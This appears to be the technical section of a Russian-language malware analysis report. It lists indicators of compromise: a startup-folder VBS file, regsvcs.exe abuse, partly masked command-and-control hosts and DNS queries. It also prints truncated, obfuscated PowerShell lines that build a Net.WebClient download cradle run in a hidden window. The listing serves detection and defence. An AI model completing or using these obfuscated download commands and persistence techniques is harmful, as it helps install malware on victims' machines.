Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\google.vbs
- %WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe
- %APPDATA%\fuckwithpac\01-05-2021
- 'bo####do.ddns.net':9911
- http://ip##pi.com/json/
- DNS ASK b.###4top.io
- DNS ASK ip##pi.com
- DNS ASK bo####do.ddns.net
- '<SYSTEM32>\cmd.exe' /c PowerSheLl $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerSheLl $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'c'+'l'+'...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'